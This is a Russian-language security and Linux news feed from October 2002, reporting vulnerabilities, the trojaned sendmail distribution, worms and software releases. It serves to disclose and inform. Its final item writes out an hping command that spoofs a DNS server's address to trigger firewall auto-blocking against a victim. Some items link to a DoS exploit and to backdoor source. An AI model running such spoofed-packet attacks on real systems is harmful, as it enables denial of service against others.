19/10/2002 13:55 Уязвимость в zlib HP Tru64 UNIX V5.1A .
Компаниями HP и Compaq выпущен cовместный бюллетень по безопасности с кодом SSRT0818U (Software Security Response Team), в котором сообщается об уязвимости в библиотеке zlib операционной системы HP Tru64 UNIX V5.1A. Подобная уязвимость может привести к локальной эскалации привилегий. Обнаружена уязвимость только в версии V5.1A. Для устранения уязвимости рекомендуется выполнить mainstream release patch kit for HP Tru64 UNIX V5.1A PK3 (BL3). Подробности - http://thenew.hp.com/country/us/eng/support.html
19/10/2002 13:45 Уязвимость в RPC-cервисе Windows 2000 SP3.
Dave Aitel из Immunity, Inc сообщает, что при помощи выпускаемого Immunity пакета SPIKE ver.2.7 (мы сообщали о нём в новостях) была обнаружена ошибка в RPC-cервисе ОС Windows 2000 SP3. Выполнение атаки возможно при открытом 135/TCP порту. При посылке определённым образом сформированного пакета на этот порт происходит DoS DCE-RPC стека Win2K. При "разрушении" RPC-сервиса полностью нарушается функциональность машины. Код для выполнения атаки включён в состав исходного кода SPIKE 2.7 для Linux. Подробности - http://www.immunitysec.com/vulnerabilities/Immunity_svchost_DoS.txt
19/10/2002 13:15 Уязвимость в Microsoft Windows Media Player v6.3 для Sparc/Solaris.
Сэмюэль Тэрдью из Франции обнаружил, что при установке Microsoft Windows Media Player v6.3 для платформы Sparc/Solaris, инсталлятор этого продукта широко известной фирмы в мире не проверяет значение umask, установленное в системе (полномочия, устанавливаемые по умолчанию в ОС при создании файла). После инсталляции пакета Microsoft Windows Media Player все файлы, созданные этим продуктом получают полномочия, позволяющие ЛЮБОМУ пользователю системы получить к ним доступ (world-writable или ***-***-rwx). Это может привести к тому, что "недобросовестный" пользователь может переписать файл своим (например, трояном, руткитом) со всеми вытекающими отсюда последствиями. Источник - http://www.securityfocus.com
18/10/2002 15:10 Cтатья "Трояны, использующие ACK-туннелирование".
На сайте securitylab.ru выложена статья Михаила Разумова "Трояны, использующие ACK-туннелирование". Описывает процедуру прохождения файрволлов троянами, использующими для своей работы ACK-пакеты (пакеты, используемые в заключительной части TCP/IP "тройного рукопожатия", а также при дальнейшей работе по протоколу TCP/IP-протоколу). В сатье приводится ссылка на троян, который работает на подобных принципах. Сама статья является переводом статьи Арне Видстрома "ACK Tunneling Trojans", выпущенной в качестве обяснения созданного им трояна AckCMD. Cтатья - http://www.SecurityLab.ru/?ID=33684 Первоисточник - http://www.ntsecurity.nu/papers/acktunneling/
18/10/2002 14:55 Хакеры взломали сайт Microsoft для бета-тестеров.
Неизвестные хакеры проникли на прошлой неделе на сайт BetaPlace, предназначенный для бета-тестеров Microsoft. Об этом еще в понедельник сообщил сайт TechTV. Первые подозрения о взломе появились, после того как Microsoft разослала 23000 пользователям BetaPlace электронные письма с просьбой поменять свои имена и пароли в системе Passport. Такая необходимость объяснялась в письме некой "проблемой", о сущности которой в письме к бета-тестерам ничего не говорилось. Позже представитель Microsoft Рик Миллер подтвердил факт проникновения хакеров на сайт. Миллер сообщил, что произошел единственный взлом BetaPlace, последствия которого ему неизвестны. Вполне вероятно, хакеры намеревались загрузить с сайта предварительные версии новых продуктов Microsoft. После обнаружения факта взлома сайты BetaPlace и Windows Beta были временно отключены для проведения технических работ. По словам Миллера, уязвимость, которой воспользовались хакеры, ликвидирована, при этом представитель Microsoft отказался сообщить, ведется ли по факту взлома какое-либо официальное расследование. Согласно появившемуся позже сообщению сайта The Inquirer, ответственность за взлом взяла на себя warez-группа iNFLUNCE. Источник - http://www.compulenta.ru/2002/10/17/34737/
18/10/2002 14:45 Спамеры взломали Windows Messenger.
Как сообщается на сайте Wired, некоторые пользователи интернет-пейджера Windows Messenger с недавнего времени начали получать сообщения рекламного характера. Спам, приходящий в виде мгновенных сообщений, стал очередным видом несанкционированной рекламы, наряду со всплывающими окнами и массовыми рассылками по почте. Как выяснилось, программное обеспечение для рассылки спама через сеть Windows Messenger за 700 долларов продает фирма DirectAdvertiser.com. ПО использует скрытую функцию Windows Messenger, которая была внедрена компанией Microsoft, для того чтобы системные администраторы могли отправлять сообщения всем пользователям локальной сети. Компания DirectAdvertiser.com использовала данную возможность по-своему и теперь предлагает спамерам рассылать в массовом порядке анонимные сообщения. Причем, источник появления сообщений практически невозможно выявить. Надо отметить, что пользователи интернет-пейджера MSN Messenger, поставляющегося в виде отдельного продукта, спам получать не будут. Источник - http://www.wired.com
18/10/2002 14:40 Очередные уязвимости в Microsoft SQL Server.
NGSSoftware cообщает об очередной порции уязвимостей, обнаружненных в Microsoft SQL Server. Были обнаружены в версии 2000 и 7. Связаны с некорректной обработки класса задач webtask. Из-за некорректного выставления полномочий xp_runwebtask, выставления полномочий на таблицу накопленных задач msdb.dbo.mswebtasks, атакующий может получить полный контроль наб базой данных, а также повысить свои привилегии в системе до уровня группы SYSADMIN. Microsoft был выпущен патч. Подробности - http://www.ngssoftware.com/advisories/mssql-webtasks.txt
18/10/2002 14:30 Red Hat выпускает новые версии ядер для своих дистрибутивов.
Как утверждает в RHSA (Red Hat Security Advisory) с номерами 2002:205-15, 206-12, 210-06, исследование кода ядра, входящих в дистрибутивы Red Hat, позволило обнаружить уязвимости, которые могут быть использованы для эскалации привилегий в системе (получение прав root). Cообщается, что в данный момент ничего о публично доступных эксплоитов неизвестно. Пользователям Red Hat 7.1, 7.2 рекомендуется обновить ядро с 2.4.9-34 до 2.14.18, 7.3, 8.0 обновить текущую версию до 2.4.18-17.7(8). Также выдаются рекомендации об обновлении версий дистрибутивов 6.2, 7.0 до версии 2.2.22. Кроме устранения причины, связанной в безопасностью, улучшена поддержка различных периферийных устройств, улучшена работа с подсистемой VM (виртуальной памяти). Иcточник - http://www.redhat.com
18/10/2002 12:55 Выход Openwall GNU/*/Linux (Owl) версии 1.0.
Специалист по компьютерной безопасности Solar Designer анонсировал выход релиза 1.0 своего продукта Openwall GNU/*/Linux (или Owl). Owl - это расширенная в части безопасности операционная система, использующая в качестве ядра софт Linux и GNU, предлагаемая в качестве серверного решения. Окончательная версия была наконец выпущена после годовой работы и выпуска многочисленных версий owl-current. Доступна для свободного скачивания с FTP-зеркал в виде образов ISO-9660, а также на CD. Бинарники доступны пока только для версий на платформах SPARC и ALPHA. Подробности - http://www.openwall.com/Owl/
18/10/2002 12:35 60-й номер журнала PHRACK MAGAZINE выйдет 25 декабря 2002.
В списке рассылки BUGTRAQ сообщается о начале приёма материалов для 60-го номера журнала PHRACK MAGAZINE. Сообщается, что это произойдёт 25 декабря этого года в качестве рождественского подарка сетевому сообществу. В связи с этим объявлено о начале приёма статей для будущего номера. Статьи принимаются с 14 октября по 13 декабря. До 20 декабря будет осуществляться редакторская правка материалов. В журнале будет представлена новая секция "Tools Armory", в которой будут рассмотрены наиболее интересные продукты и инструменты компьютерного андэграунда. Напомним, что журнал PHRACK MAGAZINE выходит с 1985 г., и представляет собой авторитетный электронный журнал, рассказывающий об операционных системах, сетевых технологиях, технологиях компьютерного андэграунда. Подробности - http://www.phrack.org/cfp_p60.txt
18/10/2002 1:24 Red Hat удаляет национальные флаги из собственных дистрибутивов
Компания Red Hat решила удалить все национальные флаги из менеджера рабочего стола KDE, поставляющегся в дистрибутивах Red Hat Linux. Такое решение было принято, после того как компании пришлось удалить флаг Тайваня, для того чтобы дистрибутив мог поставляться в Китайскую Народную Республику. Дело в том, что Тайвань, считающий себя независимым государством, формально продолжает оставаться провинцией Китая, и наличие в KDE тайваньского флага может осложнить возможное внедрение Red Hat Linux в китайских государственных организациях. Разработчики KDE были далеки от политики, когда выделяли настройки менеджера рабочего стола для каждого региона флагом соответствующей страны, однако это может повлиять на отношение китайских правительственных структур к компании Red Hat, являющейся крупнейшим разработчиком дистрибутивов Linux. Источник - http://www.compulenta.ru/2002/10/17/34749/
18/10/2002 1:1 Обновления в PAM от Debian.
Версия 0.76 PAM содержит уязвимость, позволяющую без ввода пароля воспользоваться аккаунтом пользователя (getty, telnet, ssh), пароль которого находится в состоянии "disabled". Источник - http://lwn.net/
18/10/2002 0:58 Linux - враг номер 1.
Очередное признание от Microsoft: и снова Стив Баллмер называет Linux основным кокурентом для Microsoft на рынке серверных решений, именно Linux - основной виновник столь низких объемов продаж компании-монополиста. Источник - http://quote.bloomberg.com/fgcgi.cgi?ptitle=Top%20Financial%20News...
18/10/2002 0:55 Вышла Mozilla 1.2b
Новый релиз популярного браузера. В данном релизе : поддержка фильтров для загруженной почты, улучшена поддержка Java в Mac OS 10.2 и многое другое. Источник - http://linuxtoday.com/news_story.php3?ltsn=2002-10-17-022-26-NW-DT-SW Скачать - http://www.mozilla.org/releases/
18/10/2002 0:52 Вышла Samba 2.2.6
После 4-х месяцев простоя вышла новая версия Samba 2.2.6. На сей раз множественные правки в MS-RPC, обновлена поддержка генерации smb.conf из SWAT, решены проблемы с файловыми локамиб повышена производительность... Скачать - http://download.samba.org/samba/ftp/ Источник - http://linuxtoday.com/news_story.php3?ltsn=2002-10-17-023-26-NW-SV-SW
17/10/2002 18:55 Дмитрию Склярову отказали во въезде в США
Директор компании "Элкомсофт" Александр Каталов и программист Дмитрий Скляров не смогут принять участие в очередном заседании суда по делу о нарушении российской компанией американского закона DMCA. Проблема заключается в том, что представителям ElcomSoft было отказано в получении визы на въезд в США. Подробности - http://compulenta.ru/2002/10/17/34748/
17/10/2002 0:12 RedHat идет против DMCA.
Компания RedHat, производитель одноименного Linux дистрибутива, нарушила DMCA путем выпуска заплатки в системе безопасности доступной для резидентов США, что противоречит "закону копирайта цифровой эпохи". Источник - http://newsforge.com/newsforge/02/10/16/1546251.shtml?tid=4
17/10/2002 0:6 Обновления в gv.
Обновлен пакет gv от Debian после сообщений об ошибке переполнения буфера. Уязвимость потенциально давала возможность злоумышленнику исполнить на машине произвольный код с привилегиями пользователя, запустившего gv, путем подготовки соответствующего ps/pdf файла. Источник - http://lwn.net/
17/10/2002 0:1 Linux 2.5.43
На этот раз - исправления в usbfs, sendmsg/recvmsg, ATM, обновления в dmi, sysrq и многое другое. Скачать - http://www.kernel.org/mirrors/ ChangeLog - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.43
17/10/2002 0:0 В России начался сбор подписей за признание Дня программиста официальным праздником
Программист Валентин Балт из веб-студии "Параллельные технологии" выступил с инициативой превращения Дня программиста в официальный российский праздник. Для этого он опубликовал в интернете обращение к Правительству РФ и начал сбор виртуальных подписей по адресу snake.arte.ru/256/. На момент подготовки данного материала число подписей быстро росло, вплотную приближаясь к тысяче. В случае, если виртуальное обращение привлечет достаточный интерес, Балт намерен начать сбор подписей в оффлайне, и направить российскому правительство официальное письмо. В прошлом году Балт обращался с аналогичной идеей в президентскую администрацию, однако там ему ответили, что назначение новых праздников находится в компетенции правительства. Подробности - http://www.compulenta.ru/2002/10/16/34725/
16/10/2002 18:10 Выход первой стабильной версии LinSec.
LinSec (или же просто Linux Security Protection System) является новым подходом к реализации системы безопасности в OS Linux. Данный продукт дает возможность пользователю повысить безопасность своей системы, а также произвести тонкую настройку в следующих областях:
- файловая система - пользователь получает средства разграничения доступа к файлам и директориям на уровень выше, нежели в текущей реализации
- Capabilities - усовершенствованный вариант системы полномочий позволяет регулировать права для каждого процесса в системе
- IP Labeling - система разграничения сетевых возможностей для каждого процесса. Данный класс настроек, например, позволит лишь Вашему любимому почтовом клиенту использовать 25й порт в системе и т.п.
- Socket Access Control - интерфейс настройки сокетов
Скачать LinSec 0.8.0 - http://www.linsec.org/download/linsec-0.8.0-2.4.18.patch.gz Скачать LinSec tools - http://www.linsec.org/download/linsec-tools-0.8.0.tar.gz
16/10/2002 17:35 Раздача слонов от LinuxJournal.
Известное интернет-издание LinuxJournal представила результаты опроса читателей на счет оценки ПO под Linux. Опрос охватывал следующие номинации:- лучший дистрибутив : Mandrake Linux
- лучшее графическое приложение : Gimp
- лучший текстовый процессор : OpenOffice
- лучшая графическая среда : KDE
- лучший язык программирования : C
- лучшее средство разработки : GCC
- лучший shell : bash
- лучшая архитектура процессора: AMD Athlon
- лучший сервер БД: MySQL
- лучший браузер : Mozilla
- лучший audio player: xmms
Подробности - http://www.linuxjournal.com/article.php?sid=6380&mode=thread&order=0
16/10/2002 17:32 Используем CFS.
Новая статья на linuxjournal.com повествует о деталях настройки с работы с криптографической файловой системой (CFS) под Linux. Ознакомиться - http://www.linuxjournal.com/article.php?sid=6381&mode=thread&order=0
16/10/2002 15:16 Новый "троянец" имеет российские корни
"Лаборатория Касперского", специализирующаяся на разработке антивирусных систем безопасности, обнаружила троянскую программу Netdex, использующую брешь в системе безопасности Microsoft Virtual Machine. Эта особенность позволяет "троянцу" незаметно для пользователя загружать на компьютер вредоносные программы и выполнять их. Примечательно, что анализ кода программы указывает на ее вероятное российское происхождение. В частности, в программе присутствуют строки на русском языке и ссылки на домены зоны RU. На данный момент "Лаборатория Касперского" получила всего лишь несколько сообщений о фактах заражения Netdex и уже предприняла необходимые меры для предотвращения распространения вирусной эпидемии. Источник - http://www.cnews.ru/topnews/2002/10/16/content5.shtml
15/10/2002 19:44 Полиция West Yorkshire перешла на Linux.
По подсчетам аналитиков, полиция West Yorkshire сэкономит порядка 1 миллиона фунтов путем перевода всех своих 3500 ПК на OS Linux. Источник - http://www.vnunet.com/News/1135986
15/10/2002 19:39 Red Hat Linux 8.0 как рабочая станция.
Очередной обзор новинки повествует о том, что предлагаемый релиз популярного дистрибутива реально претендует на звание полноценной Desktop системы. Ознакомиться - http://www.eweek.com/article2/0,3959,633867,00.asp
15/10/2002 19:37 Microsoft рассказывает сказки про пользователей Mac, перешедших на PC
Компания Microsoft сделала неудачную попытку начать рекламную кампанию, аналогичную той, что развернута компанией Apple. 9 октября на сайте Microsoft был опубликован рассказ женщины, пользовавшейся компьютерами Macintosh в течение восьми лет и недавно решившейся перейти на PC с операционной системой Windows. В статье рассказывалось о том, насколько удобными оказались операционная система Windows XP и пакет офисных программ Microsoft Office. Приводились и практические советы по переносу данных с Mac на PC. Статья о переходе с Mac на PC прошла бы незамеченной, если бы не находки въедливых пользователей интернета. На сайте Slashdot через некоторое время после опубликования статьи появилась информация о том, что фотография, размещенная на сайте Microsoft и якобы изображающая автора статьи, на самом деле взята из платного каталога на сайте GettyImages.com. Источник - http://www.compulenta.ru/2002/10/15/34698/
14/10/2002 23:27 Новый тип программного обеспечения для защиты от хакеров
Исследователи из университета Баффало (штат Нью-Йорк) сообщили о разработке системы защиты от хакерских атак на базе качественно новых принципов. Большинство современных систем такого рода осуществляют постоянный мониторинг сетевого трафика, задействованных протоколов и портов. Эффективность таких систем, по словам исследователей из Баффало во главе с Рамкумаром Чинчани, составляет 60-80%. Для повышения эффективности защиты Чинчани и его коллеги предлагают отслеживать не сетевой трафик, а следить за приемами работы пользователя. Специальная программная система фиксирует все команды, отдающиеся человеком компьютеру, и постепенно создает подробный перечень действий, характерных для каждого конкретного пользователя отдельного компьютера или локальной сети. Подробности - http://www.compulenta.ru/2002/10/14/34662/
14/10/2002 23:26 Ещё одна опасная дыра в Outlook Express
Корпорация Microsoft сообщила об обнаружении новой уязвимости в почтовом клиенте Outlook Express. Опасность весьма серьёзна: на сайте компании она оценена как критическая. Дыра позволяет злоумышленнику запускать на пораженной машине произвольный код. Пострадать могут пользователи двух последних версий Outlook Express - 5.5 и 6. Источник - http://www.compulenta.ru/2002/10/14/34661/
14/10/2002 15:46 Microsoft нравится идея OpenSource?
После нескольких лет негативного отношения в идеологии OpenSource корпорация Microsoft изменила свое мнение. По заявлению вице-президента Windows Server Group Bill Veghte, компания не исключает возможности использования идеи "открытых исходников" в своей деятельности. Подробности - http://news.com.com/2009-1001-961354.html
14/10/2002 15:45 Выпущена обновлённая версия Solaris 9
График появления очередных версий операционной системы Solaris, которым руководствуются в компании Sun, предусматривает выпуск одного обновления Solaris 9 в квартал. Очередная обновлённая версия Solaris 9 появилась в конце прошлой недели. Ключевыми нововведениями в Solaris 9 9/02 стали функции Memory Placement Optimization и IPQoS. Подробности - http://www.compulenta.ru/2002/10/14/34648/
13/10/2002 20:49 Тихо и незаметно вышел Blin 1.2
Blin - дистрибутив линукса, который не требует установки, работает прямо с CD. Это решение будет интересно, как новичкам, которые только начали знакомиться с linux системами, так и интеграторам, которые точно смогут найти ему применение. Сайт проекта: http://linux.zp.ua/
13/10/2002 13:15 Детали отладки с помощью Ptrace.
Новая статья в октябрьском номере linuxgazette повествует о деталях использования Ptrace для исследования программ. Ознакомиться - http://www.linuxgazette.com/issue83/sandeep.html
13/10/2002 13:10 Linux 2.5.42
Вышло очередное ядро Linux нестабильной ветви. На этот раз: * обновления документации * изменения в параметрах ядра * обновления ISAPNP * обновлен драйвер e1000 * исправлен NUMA-Q * обновления LSM и многое другое. Источник - http://linuxtoday.com/ ChangeLog - http://linuxtoday.com/news_story.php3?ltsn=2002-10-12-008-26-NW-KN-DV
13/10/2002 1:42 Новую систему конфигурации ядра Linux одобрил сам Линус Торвальдс.
Новая система конфигарации ядра OS Linux, предложенная не так давно Roman Zippel, была одобрена Торвальдсом. Предложенный подход в "linux kernel conf 0.8" до минимума снижает вероятность ошибок при сборке и, в отличии от своего предшественника, написан на родном для Linux языке Си. Вполне возможно внедрение данной утилиты в новые версии ядра. Источник - http://www.linuxdevices.com/news/NS7884985973.html
12/10/2002 15:9 Так все же, Linux безопасней нежели Windows?
Ответ на этот вопрос дает новая статья на story.news.yahoo.com. Ознакомиться - http://story.news.yahoo.com/news?tmpl=story2&cid=75&ncid=738&e=9&u=/nf/20021011/tc_nf/19649
12/10/2002 14:13 Новый проект от LinuxDevices.com
Во вторник, Rick Lehrbaum, исполнительный редактор ресурса LinuxDevices.com, сообщил о создании нового проекта - WindowsForDevices.com, посвященного новостям и обзорам ПО для Windows. Проект был создан по эгидой Microsoft и призван стать аналогом родительского проекта (LinuxDevices). Источник - http://news.com.com/2100-1001-961770.html
12/10/2002 14:10 Обзор Gentoo Linux.
Ведущий разработчик проекта Gentoo Daniel Robbins в своей статье на linux.oreillynet.com проводит обзор популярного дистрибутива. Источник - http://slashdot.org/articles/02/10/11/187222.shtml?tid=106 Обзор - http://linux.oreillynet.com/pub/a/linux/2002/10/10/intro_gentoo.html
11/10/2002 20:13 Открытое ПО не менее уязвимо, чем Windows
Старший вице-президент компании Microsoft Крэйг Манди на конференции, организованной компанией RSA Security в Париже, сообщил об успехах софтверной корпорации в рамках осуществления программы "Надежный компьютинг", направленной на повышение надежности и безопасности программных продуктов. По словам Манди, новые программные продукты Microsoft будут и разрабатываться и внедряться наряду с тщательной постоянной проверкой на наличие прорех в системе безопасности. Подробности - http://www.compulenta.ru/2002/10/11/34635/
11/10/2002 19:46 Уязвимость в tar.
Все версии tar до 1.13.25 включительно подвержены уязвимости, позволяющей злоумышленнику перезаписывать любые файлы в системе путем правильной компоновки tar-файла. Mandrake Linux уже отреагировал выпуском обновления. Источник - http://lwn.net/Articles/12468/
11/10/2002 19:43 Известна дата выхода UnitedLinux.
По cообщениям linuxtoday.com, представители UnitedLinux сообщили о дате выхода первой версии своего дистрибутива - 18 ноября. Источник - http://linuxtoday.com/news_story.php3?ltsn=2002-10-10-017-26-NW-BZ-DP
11/10/2002 16:10 Ноутбук известного хакера пошел с молотка
Самый известный в мире хакер Кевин Митник снова решил поправить свое финансовое положение за счет продажи ставших ненужными ему вещей. Хакер не в первый раз продает свое имущество через интернет. На этот раз Митник выставил на аукцион eBay один из своих ноутбуков, с использованием которых он в начале 1990-х годов проник в сети компаний Nokia, Motorola, Novell и Sun Microsystems. За кражу программного обеспечения и изменение хранящейся в этих сетях информации Митник был осужден и отсидел в тюрьме почти пять лет. Источник - http://www.cnews.ru/topnews/2002/10/10/content5.shtml
11/10/2002 16:3 Apple примет участие в LinuxExpo.
Впервые компания Apple изъявила желание учавствовать в LinuxExpo. Основная причина такого шага - продвижение на рынок своей unix-base операционной системы "Mac OS X'". Подробнее - http://news.zdnet.co.uk/story/0,,t289-s2123668,00.html
11/10/2002 16:0 Вышел Gaim 0.60 под Windows.
Вышла новая версия популярного интернет-пейджера Gaim под Windows. Данный релиз включает в себя поддержку Perl-сценариев, Gadu-Gadu и многое другое. Скачать - http://prdownloads.sourceforge.net/gaim/gaim-0.60.0-alpha2.exe?download
11/10/2002 15:54 Новый червь поражает компьютеры пользователей MSN Messenger.
По сообщениям с zdnet.co.uk, в сети появился новый червь, поражающий компьютеры пользователей популярного интернет-пейджера MSN Messenger. Заражая машину, червь рассылает сообщения по контакт-листу пользователя, поражая тем самым машины получателей. Подробности - http://news.zdnet.co.uk/story/0,,t269-s2123706,00.html
11/10/2002 12:59 KDE 3.0.4
Вышла очередная стабильная версия десктопа KDE. В этом релизе в основном исправлено ошибки в безопасности для KPF и KGhostview, также были доработаны KHTML и JavaScript, добавлена поддержка gcc-3.x для Netscape plugins, несколько учучшений в KAlarm и KNotes, и множество других мелочей.. Подробности - http://www.blif.net/
11/10/2002 12:58 Вышел FreeBSD 4.7
Очередной стабильный релиз FreeBSD. Изменения в основном коснулись GCC и Sendmail. Добавлены новые драйвера для поддержки USB устройств и дисковых контроллеров. Также обновлено XFree86 и Linux emulation libraries, исправлено несколько багов в АТА, OpenSSL и OpenSSH, а также несколько общих проблем безопасности. Источник - http://www.blif.net/
11/10/2002 10:15 Червь ''Bugbear'' проявил себя в New Brunswick
Канадская провинция одной из первых ощутила на себе действие нового червя 'Bugbear'. По сообщениям одного из ведущий канадских провайдеров, на данный момент червь не представляет большой опасности. Подробнее - http://www.ctv.ca/servlet/ArticleNews/story/CTVNews/1034239606321_115/?hub=Canada
10/10/2002 20:28 Начата регистрация участников Linux конференции 2003-его года.
В январе 2003-его года австралийский город Perth будет принимать конференцию, посвященную OS Linux. По прогнозам, на конференции будут присутствовать множество ведущих разработчиков, среди них : Алан Кокс, Bdale Garbee (проект Debian), Jeff Bates (редактор slashdot) и мн. др. Подробности - http://www.news.com.au/common/story_page/0,4057,5259316%255E15306,00.html
10/10/2002 13:02 Ежегодный Конгресс Chaos Computer Club.
В Берлине, Германия, 27-29 декабря 2002 г. состоится 19-й ежегодный Конгресс Chaos Computer Club. На Конгрессе обычно происходит обмен мнениями и технологиями между хакерами, специалистами по компьютерной безопасности. В этом году на Конгрессе будут представлены не только германо-говорящие авторы, но также и англо-говорящие. ПРедусмотрен синхронный перевод англ.->нем., нем.->англ. Заявки принимаются до 1 декабря. Перечень рассматриваемых тем довольно обширен и включает в себя (в качестве примера приведём несколько тем): протокол IPv6 и его безопасность, телефонные сети (проводные, беспроводные, GSM, GPRS, EDGE, UMTS), технологии доступа (модемы, спутники и т.д.), безопасность Ос и сетевых технологий, системы определения вторжения (IDS), технологии реверс-инжениринга и т.д. Cайт Конгресса - http://www.ccc.de/congress/
10/10/2002 12:51 Уязвимость в PowerFTP.
PowerFTP - многопоточный FTP-сервер для ОС Win, выпускаемый Coolsoft. При посылке большого буффера в адрес сервера можно его "погасить". Для тестирования автор (securma massime) использовал telnet (подключение на порт 21) и посылал большой буффер. Также выпущен эксплоит. Тестировалась версия 2.24. Эксплоит - http://www.securma.fr.fm/PFDOS.ZIP
10/10/2002 12:45 Уязвимость в HP Tru64 UNIX.
Обнаружена уязвимость в программе /usr/sbin/routed ОС HP Tru64 UNIX, выпускаемой и поддерживаемой Hewlett Packard и Compaq. Об этом сообщается в бюллетене по безопасности SSRT 2208. О подробностях уязвимости не сообщается. Уязвимыми оказали ОС: HP Tru64 UNIX - V4.0F(G), V5.0A, V5.1(V5.1A). В версиях HP-UX, OpenVMS этой уязвимости нет. Уязвимость позволяет получить доступ к важным системным файлам как локально, так и удалённо. Администраторам рекомендуется применить для каждой версии Tru64 соответствующий патч - Early Release Patches (ERPs). Названия для конкретных версий приведены на сайте производителя. Подробности (SSRT2208) - http://thenew.hp.com/country/us/eng/support.html
10/10/2002 12:36 Уязвимость в AIX.
Следующая уязвимость по своим характеристикам подобна предыдущей. Если посылать по направлению к серверу под управлением AIX пакеты со сброшенными флагами TCP, можно выполнить атаку типа DoS. Уязвимость связана с некорректной обработкой подобных пакетов в mbuf-пулле буферов памяти (управляют входящим и выходящим сетевым траффиком). Для выполнения атаки также необходим высокоскоростной канал. IBM выпустила патч с названием APAR IV31641. Источник - http://www.securityfocus.com
10/10/2002 12:28 Уязвимость в IBM SecureWay FireWall.
Сообщается о нахождении уязвимости в SecureWay 4.2.x - файрволле, применяемом в ОС фирмы IBM AIX. Для выполнения атаки, типа DoS, необходимо послать на сервер пакеты, в которых все флаги TCP выставлены в "0". Однако, для выполнения подобной атаки необходимо иметь "толщину" канала не менее 2.8 Mbps, так что подобная атака по зубам только DDoS (распределённая DoS-атака). Для устранения уязвимости необходимо либо обновиться до версии SecureWay Firewall 4.2.2, либо поставить APAR IR49046. Новая версия SecureWay - ftp://testcase.software.ibm.com/aix/fromibm/firewall/fwaixfilter4_421d*
10/10/2002 12:20 Подробности подмены sendmail.
netmask из enZotech.net провёл анализ подменённой версии sendmail-8.12.6. Как выяснилось, вставленнный код "бэкдора" включал в себя закодированную в BASE64 информацию. После декодирования было выяснено, что соединение с портом 6667/tcp происходит с хостом spatula.aclue.com (он же 66.37.138.99). Связавшись с админом этого сайта (Eli Klein <elijah@firstlink.com>), netmask выяснил, что тот не слышал об этом ни сном, ни духом (или говорил так). Сейчас сервис на порту 6667/tcp прикрыт, но прикрыт не администратором. Автор письма выражает недоумение по поводу того, что ни CERT, ни SENDMAIL не попытались связаться с администратором сервера, на который шло соединение "бэкдора". Для заинтересованных ниже приводятся пример изменённого кода sendmail и раскодированный "бэкдор". Внесённый в sendmail изменения - http://www.enzotech.net/files/sm.backdoor.patch Исходник троянца - http://www.enzotech.net/files/sm.backdoor.base64.txt
10/10/2002 12:14 Индия выбирает Linux.
Департамент информационных технологий Индии сообщил о начале перевода страны на OS Linux. В первую очередь перевод будет проведен в бизнес секторе и образовании. Причиной такового решения стало большое количество индийских разработчиков и высокие цены на лицензионное ПО. Подробности - http://www.theinquirer.net/?article=5767
9/10/2002 17:20 Дистрибутив Mandrake Linux 9.0 для Xbox.
Учаcтники проекта Xbox Linux Project выпустили первый дистрибутив ОС Linux для игровой приставки, производимой компанией Microsoft. Однодисковую версию дистрибутива Mandrake Linux 9.0, оптимизированную для работы на Xbox, можно скачать с сайта проекта. Как сообщают участники Xbox Linux Project, выбор пал на Mandrake из-за того, что тот в наибольшей степени был готов к переносу на игровую приставку. Чтобы запустить его на XBox, в Mandrake пришлось внести лишь минимальные изменения. Кроме того, по мнению авторов, Mandrake Linux 9.0 - самый современный дистрибутив на базе Linux, который как нельзя лучше подходит для новичков. Впрочем, о новичках в данном случае и речи быть не может. Чтобы запустить на XBox другую операционную систему, требуются недюжинные технические познания. Во-первых, необходимо приобрести и впаять в системную плату Xbox специальный мод-чип, снимающий защиту от запуска неавторизованного ПО. Во-вторых, к приставке должны быть подключены USB-мышь и клавиатура, причем USB-адаптер придётся сделать самому (у Xbox они отсутствуют, хотя возможность подключения USB-устройств имеется). Источник со ссылкой на дистрибутив - http://www.compulenta.ru/2002/10/8/34531/
9/10/2002 12:30 Новая версия Cyrillic HOWTO.
Евгений Балдин обновил русскую версию своего Cyrillic HOWTO для ОС Linux. В версии 1.4.2 от 29 сентября 2002 г. описывается, как настроить кириллицу для редактирования, просмотра и печати документов в Unix-подобных системах. Спасибо автору за проделанный труд. Рекомендуется к прочтению администраторам серверов и рабочих станций под управлением ОС Linux. Cyrillic HOWTO - http://www.inp.nsk.su/~baldin/Cyrillic-HOWTO-russian/index.html Полная версия с XML-http://www.inp.nsk.su/~baldin/Cyrillic-HOWTO-russian-dist.tar.bz2
9/10/2002 12:23 Обновление Iptables tutorial.
На сайте opennet.ru обновлена статья по настройке iptables-файрволла, встроенного в ядра Linux версии 2.4. Версия документа 1.1.11. Читать здесь - http://www.opennet.ru/docs/RUS/iptables/index.html
9/10/2002 12:15 Версии sendmail содержали "троянца".
Как сообщает в своём бюллетене по безопасности CA-2002-28 CERT, в течении довольно длительного периода времени с FTP-сайта ftp.sendmail.org под видом файлов sendmail.8.12.6.tar.Z, sendmail.8.12.6.tar.gz распространялась заражённая "троянцем" версия популярного почтового MTA. Заражённая версия пролежала на FTP с 28 сентября 2002 г. по 6 октября - замена на легальную версию произведена в 22:15 PDT. Анализ исходного кода показал следующее. При сборке программы запускался код, при помощи которого происходило соединение с удалённым сервером на порт 6667/tcp. Код также порождал шелл, позволяющий удалённому пользователю неавторизованно подключиться к машине с полномочиями пользователя происзводящего сборку sendmail. Не обнаружено доказательств существования бэкдора после перезагрузки системы. В качестве предотвращения заражения CERT Рекомендует проверить PGP-сигнатуру и MD5-сумму скачанной в этот период версии sendmail-8.12.6. На сервере www.sendmail.org приведены их правильные значения. Подробности - http://www.cert.org/advisories/CA-2002-28.html
9/10/2002 11:55 Уязвимость во многих PC firewall.
Yiming Gong, cтарщий системный администратор China Netcom утверждает, что им обнаружена возможность проведения атаки типа DoS против многих PC firewall. В самом письме упоминаются следующие продукты этого класса: BlackICE Defender for server, BlackICE Server Protection, Norton personal firewall 2002. Cмысл уязвимости заключается в том, что если имеется возможность формирования атаки с формированием в качестве источника другого сервера (IP-спуффинг), эти файрволлы блокируют подобный сервер. В качестве источника можно указать (например) роутер атакуемого (если известен его внутренний IP-адрес), DNS-сервер атакуемого, а также известные Интернет-сервера, к которым может обращаться атакуемый (поисковые сервера, новостные сервера). При включённой функции автоблокировки источника атаки (auto-block function on - установка по умолчанию) вышеназванных PC firewall-ов за короткий промежуток времени можно отрезать атакуемого от "внешнего" мира (Internet). При испытаниях автор использовал инструмент hping (www.hping.org). Была имитирована атака, подобная trinoo DDOS. Пример: hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.of.dnsserver. Symantec ответил, что информация передана команде разработчиков, BlackIce ответил, что в настоящей версии файрволла ничего не может быть сделано и они попытаются устранить это в будущем 